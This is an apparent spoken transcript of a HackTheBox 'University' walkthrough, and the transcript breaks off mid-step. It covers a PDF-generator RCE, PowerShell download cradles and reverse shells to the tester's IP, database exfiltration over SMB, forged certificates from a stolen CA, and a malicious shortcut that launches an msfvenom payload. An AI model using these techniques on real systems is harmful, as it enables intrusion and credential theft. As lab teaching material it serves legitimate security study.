What's going on YouTube? This is IPSEC, and we'll be doing University from HackTheBox, or I guess I should say Attempt University, because a lot went wrong when recording this video. I debated on redoing it, but I figured I'd just roll with it in case any of the troubleshooting or pain is helpful to you. Anyways, the main difficulty with this box comes from one step that is really hard to spot. Once you get a shell on the domain by exploiting a PDF generator, you find a set of credentials that lets you log into two other VMs, a Linux host and a Windows host. The Windows host is trusted to delegate and has unconstrained delegation, and we are root on the Linux box. Because both of these hosts are on the same broadcast domain, we can perform a man-in-the-middle attack, and when the Windows workstation looks for a wpad, the Windows proxy auto detection over IPv6, we insert ourselves into that conversation and use NTLMRELAY to open up an attack path that lets us impersonate administrator to the Windows VM. With that admin access, we can gain access to other Kerberos tickets that grant us the ability to read GMSA passwords, the group managed service account, which leads to an account that can impersonate users to the domain. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, SV enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it university, and then the IP address of 10.10.11.39. This can take some time to run, so I've already ran it. Looking at the results, we have 13 ports open, the first one being DNS on port 53, and the banner tells us it's simple DNS+. So we know this is going to be most likely Windows Active Directory. We can scroll down when we see that DNS banner and see, yes, there is a LDAP domain, and it's university.htb. We also see a HTTP server on port 80, and it's redirecting us to university.htb, and it is running Nginx, which is a little bit odd. Normally I don't see Nginx on Windows, but let's go ahead and start adding things to our host file because we have a domain. So I'm going to go ahead and copy this, and then let's do sudo v etc host, and we can say 10.10.11.39. We have university.htb, and then let's see, where is going to be the computer name? I don't think we actually see the computer name. We just see university.htb, university.htb. I'm not seeing anything that would indicate the computer. We also have Kerberos on port 88. It is giving us the time, RPC ports, LDAP is going to be Active Directory, SMB, and that looks about it. Looking at the host scripts, we see there is a clock skew. So if we want to do anything Kerberos related, we probably should make sure we do a NTP date to sync the time, which we'll do a little bit later. I never get the actual name. Maybe it's right here, the service info host DC. This could just be the host name, but it could also just be saying this is a domain controller. To be sure, I'm just going to run netexec. So we'll do netexec, SMB, and then 10.10.11.39. And this should go ahead and tell us what the host name is. So it is DC, right? So let's go ahead and also add that to our host file. So we'll do DC and DC university.htb. Save this. And then I'm going to go ahead and just take a look at the website because we did have port 80 open and it's running Nginx, which I do think is weird. It is a TTL of 127, so it's most likely running Nginx on Windows. If the TTL was, let's say, 62, I would think there's going to be some type of routing going on and is pushing this to a different host, right? Because on Linux, the default TTL is 64. And if we have to go through the Windows box to get to Linux, then that's an extra hop. So you decrement by 63 to get to Windows, then 62 to get back to Linux. So let's just go ahead and try this. So I'm going to do HTTP university.htb, and we'll see what comes back. My burp suite, I think, is set to intercept. So let's turn that off. And we get a page. So taking a look at this, my first thought is it's Nginx. Maybe it's a PHP website. We get not found. We could go over to like Wapalizer and see what it says. And it is going to tell us this is going to be a Django website, which is a little bit odd. I've not really come across Django running on a Windows host. Normally that's going to be a Linux. So I'm just going to double check the TTL real quick just to make sure it looks like it's Windows, right? Because if we ever find a exploit, we definitely want to know what the host OS is so we know what type of commands to run, right? So never hurts to just double check. So we'll do sudo tcp dump on ton0, do -vv, and now I can do a curl university.htb. And we can see where is the TTL 64. This is me making a request to the box. We can see 10.10.14.8 to university, right? So we want one where university starts. And this TTL is 127. We just sent a bunch more packets, but we can do this again. And we see TTL 127 here. So it is looking like it is running Django on Windows, which is just a little bit odd, but I guess not impossible. Taking a look at this website, it looks like it is going to be a university website, and it is like a single page. As I scroll down, things change the highlighting here, right? If we go to like browse courses, it wants us to input a username and password, or we can log in with a signed certificate. If we go to register, we can register a student account or professor account. If we go with a professor account, I'll do professor ip root professor at ipsec.rocks, password of password, password's too common, password 1. If I typed that correctly, register. It looks like we've registered. We do professor ip, or did I do the other one? Okay, professor ip. We have sorry, this account is not activated and can't be authenticated. So it looks like with a professor account, we will have to find a way to activate it, right? And that's what this note is saying. After creating your professor account, your account will be inactive until your team reviews your account details and contacts you by email to activate your account. So right now I'm thinking we'll have to do some type of cross-site scripting attack in order to do like cross-site request forgery in order to activate our professor account to become a professor, but not positive. That's just kind of what I'm thinking about after seeing that note. So let's go over and register a student. So we'll just do ip root at ipsec.rocks, and we'll do the same password. Register. Log in. And we get logged in as a student. So let's see, we have a profile here. We could test for like cross-site scripting. So if we do b ip/b submit, we have to do all this details. There we go. Let's see. We do have the rich text editor showing this in bold, but I don't really see that much. So if someone clicks on our link or our account, we'd be able to potentially get code execution, right? So I'm going to do image source is equal to HTTP 10.10.14.8 port 8000 test.png. And all I'm going to do with this is save it, and then we'll just leave it running and see if anyone ever hits it, right? So Python 3 m HTTP server, submit. It just went away. So I wonder if that is like filtering something, or I did something incorrectly, but let's just see what else there is. So if we go to course list, looks like we have some courses. If we go to enroll, we have lectures. So if we go introduction, looks like a PowerPoint. Really not much here, right? This one has a zip we can download, lecture 2. I'm going to see what's in that zip. Downloads, lecture 2, 7ZX, lecture 2. We go in this archive, and it looks like we have a few shortcuts, right? We have an internet shortcut, and it's telling us the URL here, a document. There's really not that much. So let's see what else is there. If we go back to home, or maybe we want to go back to our profile. Let's see, request signed certificate. So it looks like we can generate a certificate signed request with this. And what I want to do actually, let's go back to the course list. we have a professor here, Professor Naya, right? This is going to be Naya Laura Croft at Skype.com. So when I create this certificate signing request, I want to put this user's information, right? So I'm just going to rename these files so makes more sense to me. We have Naya.key, Naya.csr, which is certificate signing request. We need to enter a password. I'm just going to do password for the phrase, country code, state. This stuff probably does not matter. What matters probably is going to be the common name. And I'm going to use the username here, which is Naya. And then the email address, we'll use nayalaracroft at skype.com. Challenge password, we don't need that. There we go. So now we have a certificate signing request. So let's go ahead and upload this and see if the server will send us anything back, right? So we'll do HTTP. This box is university. Naya.csr. Send it. Submit. And CSR information does not match the database records. So it doesn't look like we can make a certificate from another user. So let's see what else we can do here. If we go, we also have a profile export. So if I click on profile export, we have profile -6. So let's do move, downloads, profile. Was it a lowercase p? It was. Profile-6.pdf. If we look at this PDF in EXIF tool, it's something I highly recommend doing whenever you get PDFs, because generally it tells you how it's created, right? We have XHTML to PDF. And if we also looked at the hex data of this PDF, we would see it's ReportLab generated PDF document. And back when we did a box called Solar Lab, we had exploited this. So let's see if it is vulnerable. So let's go and Google, what is it? ReportLab exploit XHTML2 PDF. Let's just add all these details in and see if anything comes back. We have a ReportLab RCE from 2023. And if we scroll down, we'll eventually get to the proof of concept. Looks like it is right here. And definitely use this one. There is a difference. So if we look at this, we have 3 of these brackets. And I'm going to go look at the code real quick. I've already copied that to my clipboard. Let's just put it in a file called payload here so we have it. If I go to the actual Python and then we try to take it out of this, it's slightly different, and I think it causes issues, right? We only have 2 of those brackets, you see? So I think that's actually going to cause an issue, so definitely grab it out of the README if you're doing this repo, because that's the one I find definitely works, right? So now what we want to do is send a ping command. And I want to say on Windows, it's ping-c for account. So we can do 10, 10, 14, 8. I'm actually going to do n. This is going to fail most likely, right? Because n, I think, is how you do it in Linux. Let's do n1, 10, 10, 14, 8. Maybe it's just c as well, because that just did 3. Okay, let's do c. We'll do c1, save that. The reason why I want to make sure I limit this is because on Linux, the default behavior is to ping indefinitely. So if I just do this, right, it's never going to stop. So if this HTTP thread doesn't die out, then the server is constantly going to be pinging me, and that's not a good thing. So that's why I always like limiting my pings. So we have that. We can save it. Let's do a sudo tcp dump -i ton 0. We'll disable DNS with n, and then filter for ICMP. Okay, let's cat the payload. We can now grab this. And what I want to do is go back to my profile. We'll put this in the rich text editor, paste it. And now when XHTML2 PDF is called, it's going to use that malicious HTML, and hopefully we get to code execution. So I'm going to do profile export. And do we see any hits? We don't. That could just be Windows is using -N1 for the count, and we did -C1. So let's just go ahead and remove that real quick. So like that, because the -C on Windows could have caused some type of error that caused us not to ping. And Windows, the default is to only ping 4 times, so I don't really have to limit it there. So we've just kind of ruled out that this is Linux, right? So let's go ahead and paste this exploit in, and we're going to really hope this works, because if it doesn't, I don't know what I screwed up, right? So we're exporting, and there we go. We have some pings. 10, 10, 11, 39 is pinging me. So yes, on Windows, I think it is -N to put the count as 1. In Linux, it's C. But we have 4 pings now, and we have code execution. So let's go ahead and copy Nashang. So I'm going to do cp user share Nashang, and let's do shells invoke PowerShell TCP, 1 line PS1 to just dub shell.ps1. Okay. And let's see. Delete. That is good. Now let's do 10, 10, 14, 8 on port 9001. And let's see. I'm just going to see if we can execute it straight. Normally I put it on a web server in case Defender is there, but let's just try this real quick. So we'll do UTF-16 little endian base 64 W0. Yeah, that should be fine. And what we want to do, let's go back to the payload. And let's see. We'll do PowerShell -enc for encoded command. And we'll do this. I wonder if we have to do like no profile and all those things. Let's just save this first and we'll see if it works. So a cat payload, grab this new thing with a reverse shell. NC LVNP 9001. Let's paste this in. Submit. I'm actually going to do RL wrap, so I have my like up and down keys for command history. Export this profile, and it does not look like we get a shell. So this could be Defender. It could be our PowerShell command is wrong. There's a lot of things that could have gone wrong there. So let's now go back to dub. Do vcradle IEX new object net.web client download string HTTP 10.10.14.8 8000 shell.ps1. I think I've typed that correctly. Let's see. Cat cradle I convert UTF-16 little endian, because that's how Windows likes it. This is a bit smaller, so we can copy this. We can kill that one, TCP dump. Let's try this. Oh, I wonder if it was that plus that broke it. I don't have a plus in this payload. But there was a plus there, and I could definitely see that being translated to a space, not a, what is it normally? Space instead of the plus. So that's probably where we went wrong. LVNP 9001. So let's see. Paste this in. Submit. And that's why, like in previous videos, you normally see me trying to get it just to be pure alphanumeric, getting rid of all the symbols, because that really can screw things up. Does not look like we are getting any hits though. Let's see. The payload. I wonder if we're in PowerShell. Hold on. Let's just do curl HTTP 10.10.14.8 8000 shell.ps1. And then we will execute it. Let's try this. Curl HTTP 10.10.14.8 8000. That should be fine. We have to cat this real quick. Then let's go back. Save this. Export. There we go. We have a hit and a shell. So I'm not sure what was being broken in our previous PowerShells. Let's see. Is it revshells.net or something? Revshell.net. Reverse shell. Revshells.com. That's what I was looking for. Let's see. Let's get some other PowerShell flags. Let's see. Where is that running? No profile. That's probably what I want. We'll do all these. So let's go back to my payload. I'm actually going to payload.1. I'm just curious if this will work. So we want to do PowerShell, no profile, this, dash encoded command. This. Okay. And then we'll run this. And if this doesn't work, we'll just chalk it up to I'm doing something wrong, or for some reason this doesn't work, and we won't dive too deep into it. But these are things I like just playing with as I do it, because it's always nice to know how things fail. Let's see. Does not look like we're getting a hit. It is definitely thinking. Got the payload, no hit. So I'm really not sure why that doesn't work. Maybe in the comments, someone will figure it out and tell me. But until then, this payload works where we download it to a file and then execute it. It's always nice to have a bunch of ideas of how to do code execution, like a bunch of just gadgets or whatever you want to call them. So save this, export, hit, shell, there we go. But yeah, anyways, that's why when confirming remote code execution, I always like starting out with a simple payload like a ping or a sleep, verify it works, then try the more complex things like a reverse shell that can fail a lot of different ways. Because if you don't know you have remote code execution, you won't know how to tweak your reverse shell or when to stop tweaking it when you just give up and it doesn't work, right? But now that we have a shell on the web server, I always like going ahead and grabbing the database. And if I was on Linux, I just run like SQLite 3 and dump this database this way. But since I'm on Windows, it's a little bit more challenging. I also can't just easily copy and paste in base64. So I'm going to go ahead and start up a SMB server. So we can do SMB server.py. And then I'll call it share. We'll mount it from the current working directory. The username is going to be IPSEC and the password is going to be IPSEC. And I have to run this with sudo because it's a privileged port. And it's probably going to be like impacket-smb server on parrot. There we go. And now we have to mount it. So we could do net use 10.10.14.8 / share user ipsec like that. Maybe it's /u. Oh, wait. I'm doing net user. It's net use. There we go. It looks like we have an incoming connection. I think it mounted. So let's now copy db SQLite 3 10.10.14.8 share. And did that copy? It looks like it may have. And I realized I just did something really bad, I think. Nope. I think I put it in dub. No. Did it not copy? I don't think it did. We should always be in dub when we start a like server or create a directory SMB, right? I did not do that. But it did not copy, right? Let's see. db SQLite 3. Let's go dub. I don't see it. Where's the net use? Let's try /u. Does not look like it's wanting to copy. Oh, I probably forgot -smb2 support. Let's try this. There we go. The net use command looks like it worked. That's what I expected to see. We authenticated successfully. So I'm guessing before, because we didn't support SMB2, it was just getting denied. But that looks much better. So we can now copy this. That's taking a reasonable amount of time now to copy. So that was the issue. We just weren't doing SMB2 support. And now we have the database file. So we can do SQLite 3, db SQLite. And then if we do like dat tables, we can see everything, right? So we can select star from Django session. I forgot from. Like that. And let's see. We can see this is going to probably be the expiration time. And all these are expired 2024. This is probably our session. So we don't see any active Django sessions. So I'm not going to bother trying to steal these sessions because I think that is expired, right? Let's see. Is it schema? Yes. So we have session key, session data, expire date. So yeah, all these sessions are expired. No point in trying them. We could also dump the users. So we could do like select star from, what is it? Probably university. This. That's not it. Let's see. Where would passwords be? Custom user? Maybe this. Yeah, this is probably it. So we have Naya Lara Croft right here and her password hash. It actually doesn't crack, so I'm not going to bother trying to crack these. But we do have a list of all the users here. There's not really any useful information in this database. So let's go back to our shell and then see what else is on this server, right? We have the CA. So we could also download all these files. And the reason why I'd be downloading this is, remember, we had a way to log in with a certificate. So if I have the root CA, then we can just log in. Oh, we can sign our own certificates, right? So we could now log in with the professor, but right now doesn't really help us. So I'm not going to do anything with it other than copy it, right? We also want to grab the key. There we go. Let's see what else is on this server. And I say it doesn't really help us signing in as the professor because we have access to the database. We're on the server. I don't know what else we could do right now. So let's see. If we do a whoami/all, I'm looking at privileges to see if we had SE impersonate. We don't. So not much there. If we do cd ... there is a db backups. So if we go into this directory, we have a PowerShell script. So we can look at this. So if we do type, we have it creating a backup, and then we have a password here. If we do who am I, we are WAO. I don't know what user this is, but we have WebAO. So maybe that is WebAO. So we have a potential credential for this. We could try it out. So let's try NXC, SMB, 1010, 11. Let's just do university.htb because I forgot the IP address. -u, WAO, -p. We can put this password in. And let's see. It does work. So we have WAO's credential. We could try downloading all the backups. Let's see if we did like, what is it? Is it get file hash star.zip? We see every backup is going to be the same. So we just really could download one and try to unzip it, but I don't think the password actually works. So I don't know what we'd gain from it. Let's just try it real quick. Copy this. What is it? 10, 14, 8, share. So when this is done copying, we can try to extract it to see if we have any other credentials. Maybe they had like a weaker hash or something like that, right? 7zxdb. Yes. Enter the password. The password should be this, but it errors. So apparently that is not the password, even though the script is saying it is. So I'm not sure what's going on there, but we do have credentials to this box, right? So we can easily run Rusthound. We could also just copy sharphound the .NET and run it from a reverse shell, but let's just run Rusthound from this box. And before we do that, I want to generate the Kerberos file. So let's see, -h grep Kerberos. Let's do -- this Kerberos5.conf. Because I don't think we need to do this, but I think Rusthound does like having the Kerberos configuration in place. So let's just copy it over top. And now let's do Rusthound domain university.htb user WAO password. Where is that password? We have it right here. Copy, paste, and it is going to start copying it. We could have also done a password spray, right? If we did like get AD user -filter star, this will get every Active Directory user on the box. Then we can do like select SAM account name, and then we could copy this list to a box, run netexec, and use that password, do a password spray across all users to also see it only works for this one user. But now that we have Bloodhound data created, let's go ahead and go cd opt bloodhound server docker compose up-d, and I will want to connect to Bloodhound. So I'm going to turn Burp Suite off real quick. Let's close a bunch of tabs. There we go. Localhost 8088, I think, is why I have Bloodhound. It may not be running yet. We're waiting on the GraphDB to start. There we go. Let's log in. And then we'll want to upload all of Rusthound files. Let's see, where did it save to? Was I in www actually? I was. So let's go to, where is administration, upload files, copy these, upload, and it's going to start ingesting. And then once it's finished ingesting, we can start taking a look at it. So I'm just going to pause the video here and we'll resume when it is done ingesting, because it can take probably like a minute or two. Okay, we're done ingesting. So let's go ahead and go to Explorer, and then let's find our user WAO, and we can just mark them as owned real quick. So I'm going to right click, add to owned. And then also if we scroll down, we don't have any outbound object control, so it doesn't look like there's much we can do from this user, right? So I'm just going to do cipher. Let's do shortest path from owned principals. So we can do this, run, and it doesn't look like we have anything. So let's just look at other queries we have. Let's see. What is up top? Locations of high value. You can see what's here. This query does not look like it's telling us too much. We have administrators here, DC. Not too much there. Let's see. DC sync privilege. That's not getting anything. That's odd. Let's see. Kerberos users. Let's see this. We have one. We have GMSA P client 01. So that is a Kerberos user. It ends in this $, so I know that's going to be a random password, so I'm not going to bother trying to crack this hash, just because you normally can't crack any password that ends with accounts that end in $. Let's see, what else is there here? Shortest path from systems with unconstrained delegation. So let's look at this. And this is actually showing something interesting. It shows workstation 3 has unconstrained delegation. So what this means is any ticket on this box will be able to essentially just forward it over to another box. So this is a very high value target here. So we can add this to high value. One of the common things people would do or used to do would be they'd find systems with unconstrained delegation, get on them, and then use an attack like printer bug or petit potom to trick the domain controller's machine account into authenticating against it. And then when they do that, then they'll be able to forward the domain controller's Kerberos ticket somewhere else and then do a DC sync or something like that, right? So these are very high value targets with unconstrained delegation. Also interesting, we have a different box on this, like WS3. If I go back to my reverse shell, if we do IP config, we have two network interfaces. We have 192.168.99.1, and then the external one of 10.10.11.39. So there's probably going to be VMs running here. If we ping WS-3, let's see, maybe I have to do like the fully qualified name. Oh, no, there we go. We have that as 192.168.99.2. So let's see if there's any other boxes on this subnet. And the easiest way to do that would be just to go in the bloodhound data, the computers, and look. So what I'm going to do is we'll cat the computers.json. And let's do JQ dot. And what do we want to get? Less. So properties. So we want to go data, properties, probably name, right? So let's do JQ. And then dot data, properties, name. There we go. -r for raw. And now we have a list of all the computers. So I'm just going to do computers.text. And then we can do for I in cat computers.text. Echo I, make sure I've done this correctly. We forgot the do. There we go. So now I'm just going to do a dig to look up the IP address if it exists, right? So we'll do dig, specify the server. So DC university.htb. Then we want to do, what is it? I know all answer. There we go. So we have the DC 99.1, WS3 99.2. We have setup machine, which is 10.10.10.4. I want to say we should have got lab. I don't know why we didn't. Let's see. If we go back here, can we ping lab-2? Does this work? Maybe it doesn't. Oh, there we go. We have 168.199.12. I wonder if, let's see, what'd I call it? Computers. I wonder if this needed all fully qualified domain names. University.htb. Let's just try this. Okay. So yeah, if we had everything as fully qualified, then that would have worked. We could have also probably done like a get computer, right? What is it? Get 80 computer filter star. Awesome. Let's see. And we can select DNS host name. And there should be a IP address, right? 192. Let's see. Let's do dash properties star. That's going to get me more than the default properties. There we go. IPv4 address. So we could have also done something like this instead of doing the DNS. Filter, select. Forget what it was. It was probably like DNS host name. Maybe name. Let's see. Yeah, name. And then IPv4 address. We have to do properties. Like that. And then we can also get all the IPs this way, right? Instead of doing it through DNS and dig, just do it this way, right? So we have workstation 3 and lab 2. So 2 IP addresses here. Let's look at what lab 2 looks like. So if I do a search, lab 2, click this. Let's see, it's a computer. Not too much information here. The interesting thing, we have operating system and it's PC-Linux. So lab 2 is a Linux machine potentially. Doesn't have any outbound control or anything. But let's go ahead and upload Chisel to this box so we can start hitting these servers, right? If we ping 192.168.99.12, let's see, does this tell me the TTL? It probably does, right? Yeah, the TTL of 64. So we know this is a Linux machine because the Windows, if we do ping.2, this will be a TTL of 128, right? So let's go ahead and upload Chisel. And I think we also have probably, if we look at WAO or groups, let's see. Let's see what groups we're a member of. Remote management. So we could use WinRM as well. So we don't have to do things in this reverse shell anymore. We could just go ahead and use what is it? Evo WinRM. I'm trying to find the password though. I should have saved the password. I can't remember where I have it. Rusthound. Let's go ahead and grab this. So vcreds.txt WAO. Just save that so we have it. And let's now evil winrm uwao p that in university HTB. And I'm going to name this DC. Okay. Now let's copy Chisel. So I'm going to cp opt Chisel exe here. And I'm going to go into program data. And then I'm going to use the upload command from evo winrm. And we can upload Chisel. we can do chisel.exe here. And it looks like it is going to be uploading. Hopefully it's not uploading to the file period. That is weird. Let's just call it c.exe. And we'll see if this works. It is uploading. Sometimes Evil1rem does take a little while to upload. We got the progress right there, so it looks like it is working. That is really slow. I'm going to give it another second. If not, then I'm just going to pause the video and we'll resume when it's done. Normally it doesn't take this long. I wonder if I should have just copied it over with curl or SMB. We did have the SMB server up, right? So we could go cd program data, copy 10.10.14.8, share chisel.exe. I'll do chiz.exe, I guess, like here. It looks like it is copying. I think that's going to be much quicker because that is going really slow. This is going slow too. I don't know what is going on. How big is Chisel? DUHS 9 megs. It shouldn't take that long. Evil1rem. I'm trying to get the username and password. Let's just go ahead and copy this. cd program data dir. And let's see. Looks like the server's just going slow. That may be it, right? Being used by another process, so I think it's still copying. That's definitely going much quicker than the other two. But this box is still just going slow. Looks like that may have finished. And it was removed. Is Defender blocking this? We have a reverse shell, like just native PowerShell, and did not have an issue. So I have a hard time believing Defender is blocking anything. Or Defender's even on, I should say. I'm just going to pause the video and I'm going to resume when this copy is done. Maybe me trying to access it while it copied caused some type of issue. Okay, the copy is done. So let's go back here, do a dir, and it's not there. I bet this is Defender, actually. That's bizarre. Can I just do 10.10.14.8 chisel exe client 10.10.14.8 8000 are socks, and I'm going to start up a Chisel server opt chisel server port 8001 reverse, and this should be 8001. Will this work? Not found. Chisel.exe. It's there. Chisel. I think I deleted share. There we go. Defender normally won't scan like network items, so that's why I did this. However, it being 9 megs, executing this may take a while and not work well. I could have swore when I did this box before, I didn't have any issues with Defender. I'm not sure what is going on here. I'm going to give the video another pause, and we're going to see if I get a connection on my Chisel server in the next minute or two. But something definitely odd is going on. So it's probably been like 5 minutes and it's still not done copying here. And this thing isn't working of just executing it over the UNC share. So I'm going to try something else. So let's just do Chisel GitHub. I'm going to download the latest copy of Chisel and then hope Defender's just not flagging that, because I'm really assuming this is a Defender issue since when I copy the file, it just disappears, right? So we can just download the latest copy. Hopefully the signature won't be there, and then have it work this way. If this doesn't work, then I'm probably going to revert the box and try it again, because something odd could be going on, but I doubt it. Let's see. I'm going to download Linux, AMD 64. That is good. Let's see. Where is Windows? ARM. I don't want that. Let's see. AMD 64 for Windows. Okay. And then I'm going to use the HTTP server one, CP, or let's just move downloads, Chisel, Linux, and then we want Windows as well. Gunzip-G on both of them. Okay, let's just move Chisel there, and we'll rename this to chisel.exe like that. And that probably just screwed up both of my copies, actually. I can kill that, and we will kill this because I just realized after renaming it, like I copied over top of it, right? Looks like we have a pane here. Let's just do curl HTTP 10.10.14.8 8000 chisel.exe proxy.exe. We have to start up the web server. Where is it? There we go. Save it. It's taking its time. We definitely made that request. And it is 0 bytes. So I think it's copying. It's just not copying quickly, which makes me worried. Wonder if there is a smaller copy of Chisel. Doesn't look like it. Well, these are only 3 megs. Oh, these are compressed. DIR? Why is this taking so long? I think I'm going to revert this box and hope something odd is just going on. Wait. We had a connection back. I wonder if this is from this. It had to be. Hold on. Proxy chains, NXC, SMB. Was it 192.168.99.2? Is the proxy still up? It is. So I think we're accessing it over SMB did work, this command, right? It just took a while for it to get into memory and then run. So yeah, that seems to work. The curl should work. I'm not sure why, so hopefully yours just magically works. But if not, this had to have, because I didn't run the Chisel client from any like command line, right? I only ran the Chisel client from this UNC path. So that works. We'll hope it doesn't crash while we're working on it, because that was a pain to get the shell up, right? So let's see. We have that, and then also the Linux box was .12, right? So let's try our credentials on both of these. So I'm going to do proxy chains NX. We'll just do SSH. SSH WAO at 192.168.99.12. Cat creds. And we can grab this, paste it. There we go. So this is going to be lab 2. And then let's try our credentials on the other one. WAO at 192. This is actually proxy chains. Evil winrm -I 192.168.99.2 UWAO -P this. I forgot the M. There we go. Okay, so what box is this? This is WS3, right? And you actually never need to get onto this box. This does speed things up, and we're going to go over that. But if we're just on lab 2, if we SSH'd in here and we did a sudo-L and put our password in, do I still have that on my clipboard? I don't think I do. Yeah, I did. Hold on. There we go. We can do a sudo su, and we're root on this box, right? If I do an IPA, we're now on the 192.168.99 broadcast range, right? Or the broadcast domain. And if we looked back at Bloodhound, this WS3 box over here had unconstrained delegation, right? This allows unconstrained delegation is set to true. So if we can have this box make a request, we can become the WS3 computer object, right? And if we can do that, then we can give permissions to another computer object to allow us to act on behalf of that, and then sign a ticket to become administrator on this workstation. So what we want to do is a TCP dump. So we can do TCP dump -I eth0. I'm going to also add the -n so we don't have DNS. And we'll do port not 22. So we ignore SSH traffic. And we're going to see a lot of traffic just from our box itself, right? This is going to be 12 failing ICMP. What we're looking really for is any connections from either like the domain controller or the workstation 3 box. And it's actually going to happen over IPv6. So I'm going to cheat a little bit. And we're just going to do IP6. So we don't have a bunch of these ICMP. There's also going to be a bunch of NTP traffic and other things that just create noise. But if we ran this and waited probably 15 to 20 minutes, we would see workstation 3 request wpad. And that's like the Windows proxy auto detection. And we can actually man in the middle that connection and then become the WS3 computer object. So if we just were patient and waited 15 to 20 minutes, we could exploit it from here. But if we're not patient, we want to be able to get a interactive shell on this box, right? Because if I just do task list, it's actually going to fail because we're a remote connection and we don't have a lot of good privileges to this box. The reason why we want to have a interactive connection is that will enable us to tell Windows to check for activation or check for updates, use those COM objects, and force that connection, right? And if I do get process, I want to say this is it. Maybe it's get process list. Nope, get process. We can look at the processes and we see there is a interactive process to explore. So we know someone is logged into this box. I don't think we can... I think it's include username or include user or something. It requires elevated user rights. So we can't find out who is logged in. Another one would be like query session. I think all of these fail. So we can't find out who's logged in, but we know someone is logged into this box. And this is where we have to think way back, and that's where the box becomes hard if you're just not patient waiting for this connection. And if we looked at the lectures, right, one of these lectures had URLs that people clicked, right? So if we become the professor and make a new lecture, we can potentially put something malicious here that they click on, and then we get a shell, right? So let's go ahead and revisit that. And if we go all the way back, we have to go to where we can like request a signed certificate. And remember, we couldn't upload and become Naya because it didn't match our account, right? But we did download all of the certificate authority stuff, right? So if I go into www, we do have the root CA cert and key. So we don't need to use the website to sign anything because we can just sign it. So I'm just going to copy that stuff to my working directory, and it doesn't take long to generate a new one. So for that sake, let's just regenerate this in case you didn't watch the beginning of the video where we created this, right? We're going to create the certificate signing request like this. And then if we go find the professor, we could also look at like the SQL database we downloaded. But all we want to do is look at the username and email. We could put the other information in it, right? Like the country name, we could do UK because we know that's where it is. Maybe London or something. This stuff doesn't matter. What matters probably is going to be the common name, which is the name of the user, and then the email. And the PEM passphrase, I just type password. It doesn't matter. That's going to be the password the key is encrypted with. But there we go. We now have a certificate signing request for Naya. So what we want to do is use OpenSSL and sign this. So we'll do -request and then in Naya.certificate signing request. And then we're going to specify our CA file of root CA cert and then the CA key file of root CA.key. And then we'll give it Naya.pem. And now we have a signed certificate from Naya. So now if I log out, let's go log out. We can log in with signed certificate, browse, and we can do Naya.pem, log in. And now we're logged in as the professor. So if we click on create new course, that's where that's going to request a signed certificate. If we clicked around, let's go to like a course. We can add a new lecture. And this is going to be where we can add the, what is it I'm thinking of? The malicious shortcut. So first we'll have to create a detached signature file. And then we can also change a public key to match that because we have to sign everything we upload. But first, let's just go ahead and create the malicious shortcut. So if I looked at lecture 2, reference1.url, this is what it is. So what I'm going to do is let's just make clickme.url, paste this. And then what I'm going to do is replace the URL. And we're just going to say file, and then we'll do c:\program data rev.exe. And this is just going to be a reverse shell. And we'll generate a reverse shell through MSF Venom. So we can say, what is it? MSF Venom P Windows x64. I think it's shell reverse REVER. Yep, reverse TCP L host. And these boxes can't come back to us. if we went on workstation 3 and ping 10.10.14.8, it doesn't have a route back. So what we're going to do is send the reverse shell to the Linux box. So let's go ahead and find where I was. There we go. 192.168.99.12. That's going to be lab 2. And then we'll do port is equal to 9001, format exe, o rev.exe. So this should make us that executable. And then on workstation 3, let's go to program data. And this is where we're just making that leap of faith, hoping the interactive user logged into this box clicks that link, right? Where were we when we uploaded it? Let's just do pwd. Copy this. Upload rev.exe. And this should copy. Okay. So we have the click me URL. So what we can do is we need the zip, right? So we can zip click me.zip, click me URL. So we have stored that in the zip. And now what we have to do is sign it. So I'm going to do GPG, generate key, Naya, Naya.LauraCroft, Naya.LauraCroft@skype.com. Okay. Password. I think I forgot the D here. Yep, that's a weak one. That is fine. So now we have made our key. So what we need to do is sign it now. So I'm going to do GPG, Naya, detach sign, and we'll do lecture ipsec.zip. Or actually, what we name it, clickme.zip. Password. There we go. And now we have clickme.zip and clickme.zip.signature. So the next thing we need to do is just export our key. So we can do GPG, export, Naya, and we'll do Naya public.asc. We forgot T. There we go. So let's go ahead and change a public key. Let's see. This, submit. Public key has been updated. So updated lecture. Browse. Upload the zip. Upload the signature. See, the file is there. So now let us make sure everyone can access this. So we'll do icackles.exe. What is it? Rev.exe grant everyone full access. And looks like I have a typo. Let's just fix that. It was grant. And WinRM died. Let's go ahead and reconnect. And my whole proxy died. So I'm going to revert the box, and then we have to get a proxy connection back in. Okay, so the box has been reverted. Hopefully this doesn't screw up like the flow of the video or anything. But I'm going to start up the HTTP server, and then we're going to use Evo WinRM to connect to the DC, and we have to get Chisel onto this box. And I'm going to really hope we don't run into those issues we had ran into with like Chisel just not wanting to cooperate on this box. Curl HTTP 10.10.14.8 8000 chisel.exe, and I'll call it chisel.exe. Actually, we'll just do c.exe. So we can see has not, okay, there we go. is reach back to us, and hopefully this command completes and we have a copy of Chisel here. What we did before was we accessed it over SMB, which just takes forever for it to connect. And then like eventually Chisel will crash and then you lose your Rose.L, which is what happened to us. I swear when I was doing this box before, I never had issues with getting Chisel on it. And I'm not sure why I'm suddenly having issues. It looks like it doesn't want to cooperate yet again. Let's go copy this. Maybe there's an exclusion in like the web directory and doing it in program is screwing things up. Let's do a dir. In web. And then university. Let's try that same command here, because this is where the reverse shell was dropped when we were doing it through the profile. So we can try saving it here. It is still making that connection to download it. That is fine. And it should not take this long. Okay, it looks like both of these curls have finally finished. I had to pause the video. It took way longer than I expected. It was like 5 minutes, I think. But if I do a dir, we see Chisel is in both of these. So hopefully this just magically works now, right? So I'm going to start this server back up. I'm not sure why our HTTP server errored there, but we can now do c.exe, client, and then what was it? 10, 10, 14, 8, 8001 are socks, I think what I had done. And then if we go cannot connect and then connected. Okay, proxy is listening. Awesome. So now if I go back to my workstation thing, we should be able to proxy chains back in. Awesome. If we go over to the lab, this is where we're running TCP dump. And we see the server did reach out with a wpad request. So it would work if we're patient, right? But let's just get that SSH connection back up. Cat my creds. And then we're now going to have to go back to the web server and re-log in to upload the lecture. Let's do nclvnp 9001. So we're listening there. Now on workstation 3, what we want to do is go in program data. And now we're going to upload the rev.exe. And I think that's just in university, right? Yes. So we can upload home ipsec htb university rev.exe. Let's see. It should be uploading. If I refresh this, we're not logged in using our signed certificate. Let's browse. What is it? naya.pem. Where is it? naya.pem to log in. Then what we want to do, request, browse. Where is the GPG key? There it is. So we update our signing key. That is odd. Change public key. I must have clicked the wrong 